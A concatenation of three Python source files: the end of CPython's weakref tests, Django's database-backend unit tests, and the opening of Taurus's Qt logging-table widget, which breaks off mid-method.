self.assertFalse(f3.alive)
res.append('B')
f3() # nothing because previously called
res.append('C')
del a
self._collect_if_necessary()
# => res.append('f4')
# => res.append('f2')
# => res.append('f1')
self.assertFalse(f2.alive)
res.append('D')
f2() # nothing because previously called by gc
expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
self.assertEqual(res, expected)
def test_all_freed(self):
# we want a weakrefable subclass of weakref.finalize
class MyFinalizer(weakref.finalize):
pass
a = self.A()
res = []
def callback():
res.append(123)
f = MyFinalizer(a, callback)
wr_callback = weakref.ref(callback)
wr_f = weakref.ref(f)
del callback, f
self.assertIsNotNone(wr_callback())
self.assertIsNotNone(wr_f())
del a
self._collect_if_necessary()
self.assertIsNone(wr_callback())
self.assertIsNone(wr_f())
self.assertEqual(res, [123])
@classmethod
def run_in_child(cls):
def error():
# Create an atexit finalizer from inside a finalizer called
# at exit. This should be the next to be run.
g1 = weakref.finalize(cls, print, 'g1')
print('f3 error')
1/0
# cls should stay alive till atexit callbacks run
f1 = weakref.finalize(cls, print, 'f1', _global_var)
f2 = weakref.finalize(cls, print, 'f2', _global_var)
f3 = weakref.finalize(cls, error)
f4 = weakref.finalize(cls, print, 'f4', _global_var)
assert f1.atexit == True
f2.atexit = False
assert f3.atexit == True
assert f4.atexit == True
def test_atexit(self):
prog = ('from test.test_weakref import FinalizeTestCase;'+
'FinalizeTestCase.run_in_child()')
rc, out, err = script_helper.assert_python_ok('-c', prog)
out = out.decode('ascii').splitlines()
self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
self.assertTrue(b'ZeroDivisionError' in err)
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referencable
>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
support.run_unittest(
ReferencesTestCase,
WeakMethodTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
FinalizeTestCase,
)
support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import absolute_import
import datetime
import threading
from django.conf import settings
from django.core.management.color import no_style
from django.core.exceptions import ImproperlyConfigured
from django.db import (backend, connection, connections, DEFAULT_DB_ALIAS,
IntegrityError, transaction)
from django.db.backends.signals import connection_created
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.utils import ConnectionHandler, DatabaseError, load_backend
from django.test import (TestCase, skipUnlessDBFeature, skipIfDBFeature,
TransactionTestCase)
from django.test.utils import override_settings
from django.utils import unittest
from . import models
class OracleChecks(unittest.TestCase):
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle cursor semantics")
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
convert_unicode = backend.convert_unicode
cursor = connection.cursor()
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!'),])
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle cursor semantics")
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
cursor = connection.cursor()
var = cursor.var(backend.Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle cursor semantics")
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
c = connection.cursor()
c.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join([unicode(x) for x in xrange(4000)])
c.execute('INSERT INTO ltext VALUES (%s)',[long_str])
c.execute('SELECT text FROM ltext')
row = c.fetchone()
self.assertEqual(long_str, row[0].read())
c.execute('DROP TABLE ltext')
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle connection semantics")
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.cursor() # Ensure the connection is initialized.
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
class MySQLTests(TestCase):
@unittest.skipUnless(connection.vendor == 'mysql',
"Test valid only for MySQL")
def test_autoincrement(self):
"""
Check that auto_increment fields are reset correctly by sql_flush().
Before MySQL version 5.0.13 TRUNCATE did not do auto_increment reset.
Refs #16961.
"""
statements = connection.ops.sql_flush(no_style(),
tables=['test'],
sequences=[{
'table': 'test',
'col': 'somecol',
}])
found_reset = False
for sql in statements:
found_reset = found_reset or 'ALTER TABLE' in sql
if connection.mysql_version < (5,0,13):
self.assertTrue(found_reset)
else:
self.assertFalse(found_reset)
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
Test the custom ``django_date_trunc method``, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.datetime(2010, 1, 1, 0, 0)])
def test_django_extract(self):
"""
Test the custom ``django_extract method``, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
class LastExecutedQueryTest(TestCase):
def setUp(self):
# connection.queries will not be filled in without this
settings.DEBUG = True
def tearDown(self):
settings.DEBUG = False
# There are no tests for the sqlite backend because it does not
# implement paramater escaping. See #14091.
@unittest.skipUnless(connection.vendor in ('oracle', 'postgresql'),
"These backends use the standard parameter escaping rules")
def test_parameter_escaping(self):
# check that both numbers and string are properly quoted
list(models.Tag.objects.filter(name="special:\\\"':", object_id=12))
sql = connection.queries[-1]['sql']
self.assertTrue("= 'special:\\\"'':' " in sql)
self.assertTrue("= 12 " in sql)
@unittest.skipUnless(connection.vendor == 'mysql',
"MySQL uses backslashes to escape parameters.")
def test_parameter_escaping(self):
list(models.Tag.objects.filter(name="special:\\\"':", object_id=12))
sql = connection.queries[-1]['sql']
# only this line is different from the test above
self.assertTrue("= 'special:\\\\\\\"\\':' " in sql)
self.assertTrue("= 12 " in sql)
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1,2,3),])
self.assertRaises(Exception, cursor.executemany, query, [(1,),])
# Unfortunately, the following tests would be a good test to run on all
# backends, but it breaks MySQL hard. Until #13711 is fixed, it can't be run
# everywhere (although it would be an effective test of #13711).
class LongNameTest(TestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
check it is. Refs #8901.
"""
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
# A full flush is expensive to the full test, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertTrue(obj.pk > 10)
class PostgresVersionTest(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 8.3 beta4", 80300)
self.assert_parses("PostgreSQL 8.3", 80300)
self.assert_parses("EnterpriseDB 8.3", 80300)
self.assert_parses("PostgreSQL 8.3.6", 80306)
self.assert_parses("PostgreSQL 8.4beta1", 80400)
self.assert_parses("PostgreSQL 8.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 80301)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 8.3"]
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 80300)
class PostgresNewConnectionTest(TestCase):
"""
#17062: PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back.
"""
@unittest.skipUnless(
connection.vendor == 'postgresql' and connection.isolation_level > 0,
"This test applies only to PostgreSQL without autocommit")
def test_connect_and_rollback(self):
new_connections = ConnectionHandler(settings.DATABASES)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
new_connection.settings_dict['TIME_ZONE'] = new_tz
new_connection.enter_transaction_management()
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
try:
new_connection.close()
except DatabaseError:
pass
# Unfortunately with sqlite3 the in-memory test database cannot be
# closed, and so it cannot be re-opened during testing, and so we
# sadly disable this test for now.
class ConnectionCreatedSignalTest(TestCase):
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
cursor = connection.cursor()
self.assertTrue(data["connection"].connection is connection.connection)
connection_created.disconnect(receiver)
data.clear()
cursor = connection.cursor()
self.assertTrue(data == {})
class EscapingChecks(TestCase):
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is a sqlite-specific issue")
def test_parameter_escaping(self):
#13648: '%s' escaping support for sqlite3
cursor = connection.cursor()
response = cursor.execute(
"select strftime('%%s', date('now'))").fetchall()[0][0]
self.assertNotEqual(response, None)
# response should be an non-zero integer
self.assertTrue(int(response))
class BackendTestCase(TestCase):
def create_squares_with_executemany(self, args):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
cursor.executemany(query, args)
def test_cursor_executemany(self):
#4896: Test cursor.executemany
args = [(i, i**2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i**2)
def test_cursor_executemany_with_empty_params_list(self):
#4765: executemany with params=[] does nothing
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
#10320: executemany accepts iterators
args = iter((i, i**2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i**2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
#6254: fetchone, fetchmany, fetchall return strings as unicode objects
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), (u'Clark', u'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [(u'Jane', u'Doe'), (u'John', u'Doe')])
self.assertEqual(list(cursor.fetchall()), [(u'Mary', u'Agnelline'), (u'Peter', u'Parker')])
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# verify if its type is django.database.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a.save()
except IntegrityError:
return
self.skipTest("This backend does not support integrity checks.")
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrive it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
a.save()
except IntegrityError:
return
self.skipTest("This backend does not support integrity checks.")
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data without IntegrityErrors.
"""
with transaction.commit_manually():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrive it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
finally:
transaction.rollback()
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be able to write bad data without IntegrityErrors.
"""
with transaction.commit_manually():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrive it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
finally:
transaction.rollback()
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.commit_manually():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrive it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
finally:
transaction.rollback()
class ThreadTests(TestCase):
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
connections_set = set()
connection.cursor()
connections_set.add(connection.connection)
def runner():
from django.db import connection
connection.cursor()
connections_set.add(connection.connection)
for x in xrange(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEquals(len(connections_set), 3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_set:
if conn != connection.connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
connections_set = set()
for conn in connections.all():
connections_set.add(conn)
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_set.add(conn)
for x in xrange(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEquals(len(connections_set), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_set:
if conn != connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except DatabaseError, e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertTrue(isinstance(exceptions[0], DatabaseError))
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertTrue(isinstance(exceptions[0], DatabaseError))
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(len(exceptions), 0)
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError, e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError, e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class BackendLoadingTests(TestCase):
def test_old_style_backends_raise_useful_exception(self):
self.assertRaisesRegexp(ImproperlyConfigured,
"Try using django.db.backends.sqlite3 instead",
load_backend, 'sqlite3')
class MySQLPKZeroTests(TestCase):
"""
Zero as id for AutoField should raise exception in MySQL, because MySQL
does not allow zero for automatic primary key.
"""
@skipIfDBFeature('allows_primary_key_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
|
qlogtable.py
|
#!/usr/bin/env python
#############################################################################
##
# This file is part of Taurus
##
# http://taurus-scada.org
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Taurus is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Taurus is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Taurus. If not, see <http://www.gnu.org/licenses/>.
##
#############################################################################
"""This module provides Qt table widgets which display logging messages from the
python :mod:`logging` module"""
from __future__ import absolute_import
from operator import attrgetter
from builtins import range
import logging
import logging.handlers
import datetime
import threading
import socket
import click
import taurus
from taurus.core.util.log import Logger
from taurus.core.util.remotelogmonitor import LogRecordStreamHandler, \
LogRecordSocketReceiver
from taurus.core.util.decorator.memoize import memoized
from taurus.external.qt import Qt
from taurus.qt.qtgui.model import FilterToolBar
from taurus.qt.qtgui.util import ActionFactory
import taurus.cli.common
from .qtable import QBaseTableWidget
__all__ = ["QLoggingTableModel", "QLoggingTable", "QLoggingWidget",
"QRemoteLoggingTableModel"]
__docformat__ = 'restructuredtext'
LEVEL, TIME, MSG, NAME, ORIGIN = list(range(5))
HORIZ_HEADER = 'Level', 'Time', 'Message', 'By', 'Origin'
__LEVEL_BRUSH = {
taurus.Trace: (Qt.Qt.lightGray, Qt.Qt.black),
taurus.Debug: (Qt.Qt.green, Qt.Qt.black),
taurus.Info: (Qt.Qt.blue, Qt.Qt.white),
taurus.Warning: (Qt.QColor(255, 165, 0), Qt.Qt.black),
taurus.Error: (Qt.Qt.red, Qt.Qt.black),
taurus.Critical: (Qt.QColor(160, 32, 240), Qt.Qt.white),
}
def getBrushForLevel(level):
elevel = taurus.Trace
if level <= taurus.Trace:
elevel = taurus.Trace
elif level <= taurus.Debug:
elevel = taurus.Debug
elif level <= taurus.Info:
elevel = taurus.Info
elif level <= taurus.Warning:
elevel = taurus.Warning
elif level <= taurus.Error:
elevel = taurus.Error
elif level <= taurus.Critical:
elevel = taurus.Critical
f, g = list(map(Qt.QBrush, __LEVEL_BRUSH[elevel]))
return f, g
gethostname = memoized(socket.gethostname)
def _get_record_origin(rec):
host = getattr(rec, 'hostName', "?" + gethostname() + "?")
procName = getattr(rec, 'processName', "?process?")
procID = getattr(rec, 'process', "?PID?")
threadName = getattr(rec, 'threadName', "?thread?")
threadID = getattr(rec, 'thread', "?threadID?")
return host, procName, procID, threadName, threadID
def _get_record_trace(rec):
pathname = getattr(rec, 'pathname', '')
filename = getattr(rec, 'filename', '')
modulename = getattr(rec, 'module', '')
funcname = getattr(rec, 'funcName', '')
lineno = getattr(rec, 'lineno', '')
return pathname, filename, modulename, funcname, lineno
def _get_record_origin_str(rec):
return "{0}.{1}.{3}".format(*_get_record_origin(rec))
def _get_record_origin_tooltip(rec):
host, procName, procID, threadName, threadID = _get_record_origin(rec)
pathname, filename, modulename, funcname, lineno = _get_record_trace(rec)
timestamp = str(datetime.datetime.fromtimestamp(rec.created))
bgcolor, fgcolor = list(map(Qt.QBrush.color, getBrushForLevel(rec.levelno)))
bgcolor = "#%02x%02x%02x" % (
bgcolor.red(), bgcolor.green(), bgcolor.blue())
fgcolor = "#%02x%02x%02x" % (
fgcolor.red(), fgcolor.green(), fgcolor.blue())
return """<html><font face="monospace" size="1">
<table border="0" cellpadding="0" cellspacing="0">
<tr><td>Level:</td><td><font color="{level_bgcolor}">{level}</font></td></tr>
<tr><td>Time:</td><td>{timestamp}</td></tr>
<tr><td>Message:</td><td>{message}</td></tr>
<tr><td>By:</td><td>{name}</td></tr>
<tr><td>Host:</td><td>{host}</td></tr>
<tr><td>Process:</td><td>{procname}({procID})</td></tr>
<tr><td>Thread:</td><td>{threadname}({threadID})</td></tr>
<tr><td>From:</td><td>File pathname({filename}), line {lineno}, in {funcname}</td></tr>
</table></font></html>
""".format(level=rec.levelname, level_fgcolor=fgcolor, level_bgcolor=bgcolor,
timestamp=timestamp, message=rec.getMessage(),
name=rec.name, host=host, procname=procName, procID=procID,
threadname=threadName, threadID=threadID,
pathname=pathname, filename=filename, funcname=funcname,
lineno=lineno)
class QLoggingTableModel(Qt.QAbstractTableModel, logging.Handler):
DftFont = Qt.QFont("Mono", 8)
DftColSize = Qt.QSize(80, 20), Qt.QSize(200, 20), \
Qt.QSize(300, 20), Qt.QSize(180, 20), Qt.QSize(240, 20),
def __init__(self, parent=None, capacity=500000, freq=0.25):
super(Qt.QAbstractTableModel, self).__init__()
logging.Handler.__init__(self)
self._capacity = capacity
self._records = []
self._accumulated_records = []
Logger.addRootLogHandler(self)
self.startTimer(freq * 1000)
# ---------------------------------
# Qt.QAbstractTableModel overwrite
# ---------------------------------
def sort(self, column, order=Qt.Qt.AscendingOrder):
column2key_map = {LEVEL: attrgetter('levelno'),
TIME: attrgetter('created'),
MSG: attrgetter('msg'),
NAME: attrgetter('name'),
ORIGIN: attrgetter('process', 'thread', 'name'),
}
self._records = sorted(self._records, key=column2key_map[column],
reverse=order == Qt.Qt.DescendingOrder)
def rowCount(self, index=Qt.QModelIndex()):
return len(self._records)
def columnCount(self, index=Qt.QModelIndex()):
return len(HORIZ_HEADER)
def getRecord(self, index):
return self._records[index.row()]
def data(self, index, role=Qt.Qt.DisplayRole):
if not index.isValid() or not (0 <= index.row() < len(self._records)):
return None
record = self.getRecord(index)
column = index.column()
if role == Qt.Qt.DisplayRole:
if column == LEVEL:
return record.levelname
elif column == TIME:
dt = datetime.datetime.fromtimestamp(record.created)
return str(dt)
# return dt.strftime("%Y-%m-%d %H:%m:%S.%f")
elif column == MSG:
return record.getMessage()
elif column == NAME:
return record.name
elif column == ORIGIN:
return _get_record_origin_str(record)
elif role == Qt.Qt.TextAlignmentRole:
if column in (LEVEL, MSG):
return Qt.Qt.AlignLeft | Qt.Qt.AlignVCenter
return Qt.Qt.AlignRight | Qt.Qt.AlignVCenter
elif role == Qt.Qt.BackgroundRole:
if column == LEVEL:
return getBrushForLevel(record.levelno)[0]
elif role == Qt.Qt.ForegroundRole:
if column == LEVEL:
return getBrushForLevel(record.levelno)[1]
elif role == Qt.Qt.ToolTipRole:
return _get_record_origin_tooltip(record)
elif role == Qt.Qt.SizeHintRole:
return self._getSizeHint(column)
# elif role == Qt.Qt.StatusTipRole:
# elif role == Qt.Qt.CheckStateRole:
elif role == Qt.Qt.FontRole:
return self.DftFont
return None
def _getSizeHint(self, column):
return QLoggingTableModel.DftColSize[column]
def headerData(self, section, orientation, role=Qt.Qt.DisplayRole):
if role == Qt.Qt.TextAlignmentRole:
if orientation == Qt.Qt.Horizontal:
return int(Qt.Qt.AlignLeft | Qt.Qt.AlignVCenter)
return int(Qt.Qt.AlignRight | Qt.Qt.AlignVCenter)
elif role == Qt.Qt.SizeHintRole:
if orientation == Qt.Qt.Vertical:
return Qt.QSize(50, 20)
else:
return self._getSizeHint(section)
elif role == Qt.Qt.FontRole:
return Qt.QFont("Mono", 8)
elif role == Qt.Qt.ToolTipRole:
if section == LEVEL:
return "log level"
elif section == TIME:
return "log time stamp"
elif section == MSG:
return "log message"
elif section == NAME:
return "object who recorded the log"
elif section == ORIGIN:
return ("the host, process and thread where the"
+ " log was executed from")
if role != Qt.Qt.DisplayRole:
return None
if orientation == Qt.Qt.Horizontal:
return HORIZ_HEADER[section]
return int(section + 1)
def insertRows(self, position, rows=1, index=Qt.QModelIndex()):
